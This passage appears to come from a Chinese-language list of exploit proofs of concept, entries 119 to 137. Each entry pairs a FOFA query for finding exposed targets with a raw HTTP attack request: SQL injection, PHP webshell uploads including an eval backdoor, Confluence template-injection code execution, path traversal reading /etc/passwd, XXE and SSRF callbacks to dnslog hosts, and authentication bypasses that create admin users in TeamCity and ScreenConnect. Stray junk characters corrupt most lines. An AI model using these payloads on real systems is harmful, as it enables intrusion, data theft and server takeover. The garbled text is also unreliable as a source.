4 z3 x" n8 u3 S7 N  }- Q$ _-----------------------------13979701222747646634037182887--$ t$ U( ?7 [2 J; q4 N
- R% D/ Y8 n. a3 V

3 y8 @5 A& g' o  g- I. e: a访问/home/src.php
) s; u* A0 T& m0 G' E2 H1 g+ Z1 y; `/ r3 v
119. 北京百绰智能S20后台sysmanageajax.php sql注入+ E: m% q3 j/ E1 j
CVE-2024-1254
1 Q3 P4 g6 L# L7 z0 _  O: s9 BFOFA:title="Smart管理平台". t. p4 M1 k" Z; s/ d
先登录进入系统,默认账号密码为admin/admin
& o3 A+ @% c7 r! z) _POST /sysmanage/sysmanageajax.php HTTP/1.11
$ [# l1 P& F( `$ ?Host: x.x.x.x" N1 k7 D$ V+ p* w. P; ?0 R
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
+ M7 w; H$ H) J/ t$ D7 ?( EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
* Q; |) I/ @6 K/ c+ nAccept: */*
2 l9 `9 e- x4 r/ @5 C, OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 P; F# ~+ F0 A" Z
Accept-Encoding: gzip, deflate9 i+ ^3 W9 F& q+ a; h; T- M3 O* D
Content-Type: application/x-www-form-urlencoded;
  c* i, ?6 }4 j1 nContent-Length: 109  S3 B  e8 |3 Y, T8 |
Origin: https://58.18.133.60:8443/ ?$ a9 h4 J! U) l; y: g
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php. T# V6 r4 `. y$ K6 g4 ]* G; U
Sec-Fetch-Dest: empty
" a$ M, N/ J6 Z. V% i1 }; W0 g  Y9 n. jSec-Fetch-Mode: cors
- d8 u9 Z! ?2 H. x+ lSec-Fetch-Site: same-origin
3 `5 {! \8 f; C4 ^) j- R3 wX-Forwarded-For: 1.1.1.1
* Z. v0 \7 a7 O( V9 {X-Originating-Ip: 1.1.1.16 S0 ^' a3 t2 H$ j8 R
X-Remote-Ip: 1.1.1.1
" |) L# J6 J2 c9 C$ o  g3 d8 mX-Remote-Addr: 1.1.1.1  d3 D3 c2 C+ _. u  F
Te: trailers3 B+ k8 L9 c4 q9 B6 e7 ^. y, H% K
Connection: close. u6 f, n. P" H; G+ I. w6 C

3 m$ B0 g$ o, W. q& G- v" l+ \src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456; ^" |% X+ X* l7 S' f8 g1 ~
5 \( K7 _+ t; A( E$ m

! F( e* H2 D, U8 H" Q120. 北京百绰智能S40管理平台导入web.php任意文件上传8 ~! [) v; I1 s# l6 K' R
CVE-2024-1253
6 d4 ~, S$ h  V& tFOFA:title="Smart管理平台"
: b" z4 }$ y  L: A% L9 k; N9 J+ [POST /useratte/web.php? HTTP/1.1
+ F$ @8 I* t  l# {* M- r% I( F* RHost: ip:port
2 T8 @- h% @8 w  ?% [. V) l' x* ICookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db1 x# S6 ?) b. n2 B1 x! Q% v# a
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, r! f! z9 L$ \6 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 L! J: Q0 P% c0 e9 D3 b/ WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; _+ y0 z. N: H8 R* b; bAccept-Encoding: gzip, deflate+ Q# {8 \  a4 }0 L! T
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328% f$ d- w: W- ^+ G
Content-Length: 597
: y7 }' @, w# A: bOrigin: https://ip:port$ h$ T+ U: S* e" [! |& @
Referer: https://ip:port/sysmanage/licence.php" ~8 c, P9 X/ v* S$ L
Upgrade-Insecure-Requests: 1
  N$ D( S2 k) b: M* F8 [Sec-Fetch-Dest: document9 h* ^8 f. `0 a: I4 }
Sec-Fetch-Mode: navigate, J; u# B% i% \$ N6 Q
Sec-Fetch-Site: same-origin0 s3 z) K: Q. s# F  w" j; y
Sec-Fetch-User: ?14 X9 Z) c  H( d6 R3 \8 }
Te: trailers
; p, L3 L9 D# T1 L! |Connection: close
% E# l; k. o5 s( E0 m: g. L4 i1 K' v& J$ Z& M9 V2 Q# O
-----------------------------423289041236658752706300793283 o: F" Y* w3 Z
Content-Disposition: form-data; name="file_upload"; filename="2.php"
+ `8 u7 k. U+ b* m/ a) ?; ~Content-Type: application/octet-stream# `& _' H( e9 o7 `& D

' n( k) _" }; c: i1 T<?php phpinfo()?>* d# K7 |2 Y0 K: p# R4 k
-----------------------------42328904123665875270630079328! X  }  i; L! m+ W
Content-Disposition: form-data; name="id_type"
2 Q3 b' L% a: e* |0 q) o  i0 k9 ^7 R$ L9 o
1$ L3 K& {" t9 e$ d' p$ H
-----------------------------42328904123665875270630079328
1 T+ G+ _5 c8 H8 w7 C9 v+ GContent-Disposition: form-data; name="1_ck"
- o. f: I+ O* o
7 A/ |5 s- [" ~4 ?1_radhttp" |2 K. Y2 p" L6 m
-----------------------------42328904123665875270630079328
. \5 a& j' C  O* s/ @Content-Disposition: form-data; name="mode"
8 M& J# w$ r- S. A! t' d- M* _
9 N- ^9 H, q) Vimport. F* E/ o! c) F. }# w) r
-----------------------------42328904123665875270630079328
# b6 r# C* Y/ y( h" h, F& k
3 U! w$ u9 C. W. ?& r
# B) _, O- m' a  k3 v文件路径/upload/2.php0 l* S" S) _* b, I& T* k

! z, m* m- `- B" e) u9 T8 E# n4 s121. 北京百绰智能S42管理平台userattestation.php任意文件上传
: Y6 M2 n% a0 H$ GCVE-2024-1918
& Q% h) L- l5 o4 G) u" kFOFA:title="Smart管理平台"
* Z  U; t8 k+ bPOST /useratte/userattestation.php HTTP/1.1
. I/ W( d6 F3 JHost: 192.168.40.130:8443/ _1 V( \0 Q8 M
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50& y# S0 R7 R$ K6 y% w, r8 K
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% S$ ?0 ~! _4 O$ |2 s% K* bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% I9 g6 T( l1 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ ]% o8 D/ t2 i* XAccept-Encoding: gzip, deflate
0 u/ a- V2 j3 ?7 J6 N1 F, a, \' @Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, {  g, N' `% cContent-Length: 592
% ^# c7 [9 r8 w3 l) hOrigin: https://192.168.40.130:84436 ]% H5 k8 d6 y0 m- x8 e
Upgrade-Insecure-Requests: 1
& Q0 f: {* C/ a) v9 aSec-Fetch-Dest: document
& m1 o8 `4 x3 E( C$ }Sec-Fetch-Mode: navigate9 m# f1 `& ~# e3 X  P
Sec-Fetch-Site: same-origin
. M# q" R% ?% USec-Fetch-User: ?1
5 n* A! s( j% {! L) T+ _Te: trailers. s( {0 H8 h2 ~: x3 d; v
Connection: close8 b, N! E1 r1 Q
$ ]! ^' K* s, \
-----------------------------42328904123665875270630079328
- y- y, B# u$ SContent-Disposition: form-data; name="web_img"; filename="1.php"
' r% v9 c  |7 F( ?, fContent-Type: application/octet-stream- H& m( N2 J7 A7 ^1 y8 o9 T5 a

8 T1 ~; s7 j) w0 x* F<?php phpinfo();?>
- {# A; e+ m9 g( D% I-----------------------------42328904123665875270630079328  r6 k8 G7 w6 e$ Q
Content-Disposition: form-data; name="id_type"5 N+ Y/ M3 N, W. }% |( ]

, ]' G4 n) ~9 l4 c6 P1$ U4 m1 N  J, f
-----------------------------423289041236658752706300793283 s0 J3 N& M) V5 X( K/ ~
Content-Disposition: form-data; name="1_ck"
" k; m9 b" I6 v, ~( N/ y
& Q  ^1 B( f* K6 W7 G+ a8 {) w# X1_radhttp
$ Z" ~9 R3 @$ {' P6 J9 O-----------------------------42328904123665875270630079328# E: n) x$ s5 o: _' s) Y
Content-Disposition: form-data; name="hidwel"
2 F2 V3 J0 e, ?% C3 M- s8 x, U3 W& s6 j' ?: O7 J2 {2 L
set% r* e5 ~1 e# M' ?3 U6 G9 ^
-----------------------------42328904123665875270630079328  g* d% N8 x: J" E

0 }5 ^9 S2 O0 p' z  q$ W* f& ~7 X5 U; ]+ g- _
boot/web/upload/weblogo/1.php
9 X' Z& l( {5 X, z% d, f5 F: h3 q
122. 北京百绰智能s200管理平台/importexport.php sql注入& [5 N  M$ x+ ^% v( L& N
CVE-2024-27718FOFA:title="Smart管理平台"0 }4 C0 L8 {/ u& g% C: X9 K
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()) ]2 _4 d7 a. ~) n$ ^% f0 c
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
2 l$ P+ P4 E6 e3 h' U$ o2 kHost: x.x.x.x3 _# G, m7 D0 _0 F" w- D7 A
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
/ Z9 h; M; w# Q+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 _' |! i/ V9 Y8 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 P4 S% l6 r7 p5 [2 U2 |4 q% A+ L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 J6 S6 A7 r! ?2 X1 I# lAccept-Encoding: gzip, deflate, br7 e  q  H( n! w7 |9 H5 ~
Upgrade-Insecure-Requests: 1
# r5 s* ^& S* ~3 B& WSec-Fetch-Dest: document
9 ~$ u4 I5 j2 ^2 d' P& fSec-Fetch-Mode: navigate' M, \7 r# L% L. j; y, J# E# o% X
Sec-Fetch-Site: none' T# r! z  I* v6 `0 E5 _9 J6 V
Sec-Fetch-User: ?1# f' k% V7 a, }
Te: trailers8 N& d" Q& U5 w* X4 p" _3 X
Connection: close5 r9 R( h' q8 b' G( L5 l

% s& T2 o9 G- d3 H8 _: U& M4 P. ^& {. N" m
123. Atlassian Confluence 模板注入代码执行& Y  \! x8 v  W0 _$ a. V2 y( r* o
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"% Q! D, |3 V: v8 o. z5 r* W. K) b
POST /template/aui/text-inline.vm HTTP/1.17 n4 k4 K+ l; u6 J7 o: W; {1 E* [
Host: localhost:8090
3 U) u( v  R# y' j3 LAccept-Encoding: gzip, deflate, br5 Y' @) O5 a" A3 u0 M. E& w9 V
Accept: */*+ o' s; N' x+ N6 a" C1 d
Accept-Language: en-US;q=0.9,en;q=0.8
8 V' x, o1 D. h9 ?) U% UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36& I" O5 J5 h9 y0 s
Connection: close* \  ]- p8 ]% o$ o% c. r9 y
Content-Type: application/x-www-form-urlencoded
" M5 i/ T, U. t# F; w: X, v; P4 u6 F6 W( I+ `
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))5 S2 }" \# h7 m& Y5 ?

3 v6 M$ d7 R$ F% q5 s" a
1 _6 j" s5 @; V$ t) m124. 湖南建研工程质量检测系统任意文件上传1 u6 p( O4 Y8 Y% c* G! Q
FOFA:body="/Content/Theme/Standard/webSite/login.css"& E( t4 \3 i2 I
POST /Scripts/admintool?type=updatefile HTTP/1.19 v& I( V1 A/ m( ]- p0 H% Z
Host: 192.168.40.130:8282/ B1 J* H  Y1 ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* _3 o9 O% S/ w  d8 ZContent-Length: 72" R: h- j- |1 l5 V, E* c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.82 j+ W2 {  ]/ |/ z
Accept-Encoding: gzip, deflate, br4 M5 L, P8 n5 z; ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Y, @/ D" L3 v
Connection: close
/ \6 S% u, l5 O% ^  a% v- n4 mContent-Type: application/x-www-form-urlencoded
6 e6 R  N; _8 }" e, P4 ]) r5 q: N! b4 d3 j# ?) T( `
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
4 G6 X% u/ a9 Z2 z# m, \& F1 @$ E! J" I

& ~6 U$ ?# U  [0 i( r& Q0 Vhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
: s  k5 u" [* W; I+ z
' f" e& d: q( ^: b  A125. ConnectWise ScreenConnect身份验证绕过
# T7 m! m5 K& J( J4 rCVE-2024-1709
; A" {: z; b9 b& wFOFA:icon_hash="-82958153"0 u$ j2 f1 i4 N- N) s9 n
https://github.com/watchtowrlabs ... bypass-add-user-poc9 H/ \! [' s4 H2 L: }$ E0 E# H
4 w. k; |0 J% u' Z
% e6 O0 e/ f) o3 E1 a9 y# b/ G
使用方法$ j1 K! P/ W# p# f
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!# M  m3 V+ r4 g5 V; j0 f* K. o
- h' S; a, n" [4 }" ]  z
- v7 W) P4 O" N
创建好用户后直接登录后台,可以执行系统命令。
  e; }# F& M2 C, c7 J7 E$ o0 s. o3 {; x* t3 h7 Q; l
126. Aiohttp 路径遍历
3 X; ?4 N1 U0 ~/ w3 x' W+ cFOFA:title=="ComfyUI"
5 z5 O% Z2 a2 [GET /static/../../../../../etc/passwd HTTP/1.1
$ r* m; J; Z+ iHost: x.x.x.x. o. t# e% @9 g& \7 ?5 |0 o5 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# \; [0 E1 z. b3 M
Connection: close/ r- r( l7 {0 c2 k
Accept: */*
* T  Q; \- z6 OAccept-Language: en, i% d' l+ l" z; I, H# A4 K
Accept-Encoding: gzip; x' M7 |: F" l4 H! m6 F) h& V

; s' H0 q& |5 |0 h" I8 {% D' k7 z+ n& n* Y4 d8 C: Z
127. 广联达Linkworks DataExchange.ashx XXE
9 @" t4 D/ B2 `) M/ _# X5 _9 FFOFA:body="Services/Identification/login.ashx" $ [% `: K3 g7 S) l" h; l: R
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
9 o4 h& V7 c* Z8 K, ~Host: 192.168.40.130:88885 d. {% ~; Z4 u+ C" }2 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
1 J% Y2 Y) Z* D* _- X- F' D: `Content-Length: 415
  h, [1 N, k$ D/ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  `( O* i* ]3 V) S4 Y3 S2 V" LAccept-Encoding: gzip, deflate/ o8 N; c3 f) ~0 T+ j6 ^2 a
Accept-Language: zh-CN,zh;q=0.9! B2 q" {: t' r" h1 {
Connection: close0 z) L2 N8 G/ q. p2 L- ~
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0$ n. X/ J, ?, u7 P" ^4 P3 u
Purpose: prefetch
( l% O6 g4 a' h$ L1 }) WSec-Purpose: prefetch;prerender4 M! E3 h8 g4 ?1 Z# x6 t6 E

6 G% L8 U/ M6 b9 W/ I( Y, }9 l------WebKitFormBoundaryJGgV5l5ta05yAIe05 F: X( M) D3 M  k# V
Content-Disposition: form-data;name="SystemName"
  a; f6 |6 o& e/ v7 ^+ I* n. ?$ D' c
BIM
* R& o' V: v, `# u; A------WebKitFormBoundaryJGgV5l5ta05yAIe0, D' x% u+ F) ^6 B
Content-Disposition: form-data;name="Params", k7 r4 g) u5 p
Content-Type: text/plain( A0 B& D; h* Z

- J* ^1 g- s0 O" [  V<?xml version="1.0" encoding="UTF-8"?>
. h( b3 I$ t6 `1 o- M+ y6 B+ Z- [2 N<!DOCTYPE test [
8 [, f4 W2 C1 ^2 R<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
" M' l7 d# ^/ w9 B]4 f2 Y! W/ y1 l( Y
>
: F3 e0 b5 k- Y9 x<test>&t;</test>
0 O- I1 P) e- |------WebKitFormBoundaryJGgV5l5ta05yAIe0--$ [! f7 r) K4 y

9 i. v) y# Y% T4 I3 E6 ]. p" r
1 g+ ^5 N2 I) m" {1 y' }- d9 c  e9 V
5 w# H& J( ~4 ~" `" v128. Adobe ColdFusion 反序列化' ?6 L2 ~( v  J. B
CVE-2023-38203  y5 k/ X5 K$ f- j4 ^9 A
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
# _5 y1 W% |& SFOFA:app="Adobe-ColdFusion"
  L$ w: t* }+ r) H" d7 {7 sPAYLOAD1 Z, D$ d5 n, ]; h

9 W/ j- ], M0 S129. Adobe ColdFusion 任意文件读取+ a' c3 w) r0 I4 K( S
CVE-2024-20767
9 r" f3 C' p! N+ \8 w  |) GFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
: N9 |, q- f5 g8 z! @% Y第一步,获取uuid7 o# K$ ?# w: E9 r: o
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1- ?) w1 q$ j' J! |- O+ F
Host: x.x.x.x
, R% X: y2 M$ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- r/ s* h, o' p5 vAccept: */*- q+ t1 F# T. \  Q
Accept-Encoding: gzip, deflate: @( M7 l. _  b5 e8 f0 y" L. z& s
Connection: close% J& d  F  f- Z: @; Z# c  R
" ]  X" E& n" s- p4 ^! b3 h
! E% \9 n6 I- E8 N% E) N' ^
第二步,读取/etc/passwd文件
5 `+ Y8 j7 ^& W( ^! A+ nGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
  C8 X  N9 I  k7 u$ o. {Host: x.x.x.x0 O  K2 b1 m4 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 j( b  J9 [; D( y& \Accept: */*
8 a: R; \  @( x$ iAccept-Encoding: gzip, deflate
+ s* Z( v3 O: X; m3 H% M2 \Connection: close
0 X" m# V8 u2 u9 {4 ^+ r) Q  duuid: 85f60018-a654-4410-a783-f81cbd5000b9
- }6 x- ^5 Q2 i" C3 p1 ?& E; @: e9 n4 r7 m9 r
% R: O7 o" O% o% z. d' h( p" u8 a
130. Laykefu客服系统任意文件上传. D- ]& Y5 D: Y6 [& {/ z6 }" J( x
FOFA:icon_hash="-334624619"% d! d! M0 A5 V: I7 y
POST /admin/users/upavatar.html HTTP/1.11 g( N# \$ W2 R+ k% \/ y5 b
Host: 127.0.0.1
! T; v  d6 _) o- \$ `% i8 }Accept: application/json, text/javascript, */*; q=0.01
# L3 A0 X5 R5 m9 R3 RX-Requested-With: XMLHttpRequest( \5 u, S8 c/ U) X. T4 Z8 i. I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.268 B/ ]4 J) H7 Q+ P6 ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
- E$ g6 y1 n+ q8 ~: uAccept-Encoding: gzip, deflate2 E& O* ]5 H9 N
Accept-Language: zh-CN,zh;q=0.95 K/ _2 K5 S: x: }+ m+ z
Cookie: user_name=1; user_id=35 c1 [# y  g- C0 X
Connection: close2 a% M# ^- D+ j: ~( u9 n

, ]/ Q8 p1 G$ D- v' a------WebKitFormBoundary3OCVBiwBVsNuB2kR7 y/ a, ?2 _9 T* s3 S: N
Content-Disposition: form-data; name="file"; filename="1.php"4 u" w0 y! P6 M4 ]: r1 R
Content-Type: image/png5 \, y# f% Y" w- U0 r
. \$ G9 c0 ]. i  [' D
<?php phpinfo();@eval($_POST['sec']);?>7 ^1 |+ C0 k8 a  `+ e
------WebKitFormBoundary3OCVBiwBVsNuB2kR--  X5 [3 @, H) B9 [: e
! s. T2 G( z2 v: P

/ `3 J: K( f) \, t+ _131. Mini-Tmall <=20231017 SQL注入& Y6 O6 h2 L$ s0 K: U$ f
FOFA:icon_hash="-2087517259"8 A- P0 h) \" N, d/ ]7 B
后台地址:http://localhost:8080/tmall/admin  v$ ^) A9 I( q) o
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
/ L. y. g6 _9 O4 z( q$ ?
+ [$ I& h, e4 z$ b; I  p132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
0 F: C- s3 S! U, NCVE-2024-27198
, d' x" h  H6 @' [; d3 V; Y* |FOFA:body="Log in to TeamCity"- o, x. ?* k/ r, ?" B6 Q- A7 \. I
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
  B$ a: v- D9 t7 \$ z5 @5 oHost: 192.168.40.130:8111" ]- B% M6 `1 l' o1 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 }" P  s" N, d* iAccept: */*
4 q/ K3 U; `/ ]3 l3 }: ?) UContent-Type: application/json/ ]0 W+ i1 h; q
Accept-Encoding: gzip, deflate; |: q! j, L6 _4 y/ _2 d6 W

8 d) J- y! ~6 ?0 }{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}4 {) `; D8 [3 C- ^, l: @0 u

' j- I, \( {, G9 O2 J+ L; v/ B" W( u6 w$ {. Y4 P% B/ ~$ Z
CVE-2024-27199! k8 Z7 J* R6 I7 s; S( W" Z
/res/../admin/diagnostic.jsp
) ~- r/ g$ l4 ]  c- E1 ?, p/.well-known/acme-challenge/../../admin/diagnostic.jsp
: ~, X8 ]8 R; Y2 E) m8 g  \) I/update/../admin/diagnostic.jsp
+ u0 K5 o- r; Y: \: u! a; U  ^# W! D! I  ]

( E1 h, d& O! W% |CVE-2024-27198-RCE.py
# g' ~% B: K0 s# q% e( b: {1 l" E3 r3 P7 H
133. H5 云商城 file.php 文件上传9 r! _) B: A, c% A
FOFA:body="/public/qbsp.php"% w4 \7 o% ^+ Q) O! b
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
: `2 I$ t% c" O3 P: |Host: your-ip
; ~& e/ t7 W4 {  LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' \4 [5 f/ |' y( H. LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
0 g# b3 H) a" d# N" i4 r) h/ ^7 K; u+ H' j
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
/ i, A" g8 U& mContent-Disposition: form-data; name="file"; filename="rce.php") O# K) c- d  U% y$ m7 W
Content-Type: application/octet-stream( y' E5 }6 d! L( y% d

9 L2 ~& \+ s- M3 A5 h/ h4 Z" A/ ?<?php system("cat /etc/passwd");unlink(__FILE__);?>! \6 C8 ]( R# z$ S% b4 G3 v
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--* y' p4 F$ F5 _$ \2 ~3 j: ?$ Z
& i' y/ Y1 \( N# W

4 f/ j, m( y" Z+ P! h5 A2 f; e8 A. l! G; u5 N' d2 r( g' |7 c
134. 网康NS-ASG应用安全网关index.php sql注入# G9 B0 D& C# e2 A$ ]
CVE-2024-2330
  z( x, ?# x. MNetentsec NS-ASG Application Security Gateway 6.3版本& Z8 v9 R" O- W+ [* X
FOFA:app="网康科技-NS-ASG安全网关"
- {( @3 k1 d8 \: P* G" M! LPOST /protocol/index.php HTTP/1.1
7 e. z* a% P3 IHost: x.x.x.x
0 L% Z$ ~1 V. u& P, x9 e) bCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de4 U2 g0 B% r( F! V3 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
! |7 D- ~( p* }( @Accept: */*  P8 F# I3 `) a6 b* m; X& |1 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 J! E' l) s* J9 G1 dAccept-Encoding: gzip, deflate
( j, s  E+ v9 ~Sec-Fetch-Dest: empty
/ C8 U9 n; I* t0 D$ l  Z$ vSec-Fetch-Mode: cors' i6 l; {4 R! G; H1 z/ h7 ~
Sec-Fetch-Site: same-origin5 Z3 j2 i# Z4 N) x
Te: trailers. a1 r: ^1 K0 m" ~
Connection: close
9 }6 C( W5 A. X; @9 Q! LContent-Type: application/x-www-form-urlencoded
8 ?, f: `7 c# N1 ~' ^4 j0 g) QContent-Length: 263  r* }: n( I5 ?/ T/ I; p

" X# s, S4 U' W1 ^9 K0 y2 M. s# `jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}4 w1 u5 H& ^# V2 ]7 e% F

0 A9 d5 E2 x9 Q6 Q& Z
9 O# @# K* O5 u! s" m135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* |- R3 S! C* V! X% c; L- Z4 I
CVE-2024-2022& N6 e; K: ^5 v4 g0 b8 D; o. d
Netentsec NS-ASG Application Security Gateway 6.3版本
% i. K" R: G/ L! o4 |FOFA:app="网康科技-NS-ASG安全网关"+ Y' B! q, J" V4 t
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
; m* f3 R% Z& n! A) m+ V; IHost: x.x.x.x! z4 c# H! G7 P" K: E  |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 K. o( I, P2 l( Z. aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  }9 \# E' k, ^/ w
Accept-Encoding: gzip, deflate1 I1 ~; m. V8 u# \* l
Accept-Language: zh-CN,zh;q=0.9
, X  B- ^: @# v" w' ~Connection: close
1 V, _' ^5 c! e- L, }) x- f6 w
5 U6 Y% g0 b8 ]5 l9 S, I8 D# y0 T( B/ {8 X5 X. L& p
136. NextChat cors SSRF8 S! m: X0 Z0 C" G: q8 M
CVE-2023-497850 n/ ~/ @% k# `" X
FOFA:title="NextChat"' C0 C& t9 c/ G% x6 ~1 z
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
% e; O, L0 M1 @3 p: c: qHost: x.x.x.x:10000
' l7 a  ?  H4 q2 e- jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, @, E2 l# x. N- L+ k- A# f
Connection: close  V1 J5 e6 _' p1 ]( ~6 S9 e1 e# i
Accept: */*
: T0 a) ]: I/ ]2 TAccept-Language: en
; c- M$ f0 x% qAccept-Encoding: gzip4 F) L0 `- ^/ @) K# |" [* I
* u# v4 p( B  {  u2 Z. A9 W' m
5 b6 m& h( q$ K: S
137. 福建科立迅通信指挥调度平台down_file.php sql注入
8 L: D& B, S# f; R  SCVE-2024-2620
# \5 s2 e0 c8 I- ?! lFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 m9 e$ \0 Y( ^& d# gGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
) i0 k8 u1 @$ N0 D7 bHost: x.x.x.x
0 |2 s, ]* e% R1 W# d' [+ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( F1 }& _2 i- z: T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 E5 j& n+ ?) @) b, u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% T# r8 P& b& h  T  G8 e
Accept-Encoding: gzip, deflate, br+ Y' M! k) Y& W" v" G* c
Connection: close
